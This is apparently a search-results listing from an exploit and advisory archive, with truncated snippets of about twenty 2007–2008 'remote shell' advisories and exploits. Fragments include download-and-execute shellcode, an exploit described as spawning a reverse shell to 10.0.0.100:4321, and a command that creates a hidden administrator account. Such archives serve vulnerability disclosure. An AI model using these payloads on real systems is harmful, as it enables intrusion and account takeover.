894 matches found
airspan-bypass.txt
Topic: Airspan ProST Modem Management Authentication Bypass Vulnerability Announced: 2008-03-13 Product: Airspan ProST Antenna Vendor: http://www.airspan.com/ Impact: Remote shell access Affected product: Airspan ProST with firmware 6.5.40.0, Hardware rev 4.1 Credits: Francis Lacoste-Cordeau I...
waraxe-2008-SA065.txt
waraxe-2008-SA065 - Remote Shell Command Execution in Coppermine 1.4.14 =============================================================================== Author: Janek Vind "waraxe" Date: 30. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-65.html Target software descriptio...
[waraxe-2008-SA#065] - Remote Shell Command Execution in Coppermine 1.4.14
waraxe-2008-SA065 - Remote Shell Command Execution in Coppermine 1.4.14 =============================================================================== Author: Janek Vind "waraxe" Date: 30. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-65.html Target software descriptio...
windows/XP download and exec source
No description provided by source. ; Nice theorhetically generic url download and execute ; shellcode for Windows XP. ; ; Heck, atleast it saves you using tftp! ; ; [email protected] ; ; nasmw -s -fbin -o download.s download.asm bits 32 start: jmp short avoidnastynulls continue: pop edi ; edi...
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "--------------------------------------------------------------------\r\n"; echo "| WordPress = 2.0.2 'cache' shell injection exploit |\r\n"; echo "| by rgod [email protected] |\r\n"; echo "| site:...
HP Compaq Notebooks - ActiveX Remote Code Execution
HP Compaq Notebooks - ActiveX Remote Code Execution !- Advisory: Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access...
Remote Shell Command Execution in "KB-Bestellsystem" (amensa-soft.de)
"KB-Bestellsystem" is a domain order system written in Perl. The "domain" and "tld" parameters in "kbwhois.cgi" are not filtering shell metacharacters. The following examples will show you the /etc/passwd file:...
FSFDT v3.000 d9 (HELP) Remote Buffer Overflow Exploit
No description provided by source. $ nc -l -p 4321 Microsoft Windows 2000 Version 5.00.2195 C Copyright 1985-2000 Microsoft Corp. E:\draft\fsd1110\windows ------------------------------------------- !/usr/bin/perl FSFDT remote exploit by weakatfraglab.at spawns reverse shell to 10.0.0.100:4321...
Windows rshd buffer overflow
Added: 08/03/2007 CVE: CVE-2007-4006 BID: 25044 OSVDB: 38572 Background The Windows implementation of RSHD is a remote shell daemon which has been adapted to run on Windows platforms. Problem A buffer overflow vulnerability in the Windows implementation of RSHD allows remote attackers to execute...
Windows rshd buffer overflow
Added: 08/03/2007 CVE: CVE-2007-4006 BID: 25044 OSVDB: 38572 Background The Windows implementation of RSHD is a remote shell daemon which has been adapted to run on Windows platforms. Problem A buffer overflow vulnerability in the Windows implementation of RSHD allows remote attackers to execute...
Windows rshd buffer overflow
Added: 08/03/2007 CVE: CVE-2007-4006 BID: 25044 OSVDB: 38572 Background The Windows implementation of RSHD is a remote shell daemon which has been adapted to run on Windows platforms. Problem A buffer overflow vulnerability in the Windows implementation of RSHD allows remote attackers to execute...
Remote shell command execution in extensions embedding PHPMailer
Multiple TYPO3 extensions is affected by the third party tool PHPMailer, which is vulnerable to a remote shell command execution. Component Type: Third party tool. This tool is not part of the TYPO3 default installation. Affected extensions: agprjmgm version 0.0.1 bbphpmailer version 1.73.1 and a...
IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
No description provided by source. !/usr/bin/python IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 Tested on windows 2003 server SP0. Coded by Mati Aharoni [email protected] http://www.offensive-security.com/0day/ibm-ti-pro.py...
Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit
No description provided by source. !-- IE 6 / Virtual CD 9.0.0.2 vc9api.DLL 9.0.0.57 remote shell commands execution exploit by rgod site: retrogod.altervista.org software site: http://www.virtualcd-online.com/ -- html object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C'...
Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution
Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...
Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit
Exploit for unknown platform in category remote exploits ======================================================================= Virtual CD 9.0.0.2 vc9api.DLL Remote Shell Commands Execution Exploit ======================================================================= strCmd="cmd.exe /c net use...
Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution
strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...
ImI image file inclusion in script upload
w2box: web 2.0 File Repository Upload Script Code Source http://labs.beffa.org/w2box/ Dork : "powered by w2box" Discovered by 4ur3v0ir Homepage Four: http://www.security-frog.org http://www.c-group.org http://hslteam.org Greetz To:NINF,frat2005,komtec1,kakalake,AntraX,fr34k And Staff...
GNU Mailutils imap4d 0.6 Remote Format String Exploit (exec-shield)
No description provided by source. / Fedora Core 6 exec-shield based GNU imap4d mailutils-0.6 search remote format string exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt Reference:...
GNU Mailutils imap4d 0.6 - exec-shield Remote Format String
GNU Mailutils imap4d 0.6 - exec-shield Remote Format String / Fedora Core 6 exec-shield based GNU imap4d mailutils-0.6 search remote format string exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt...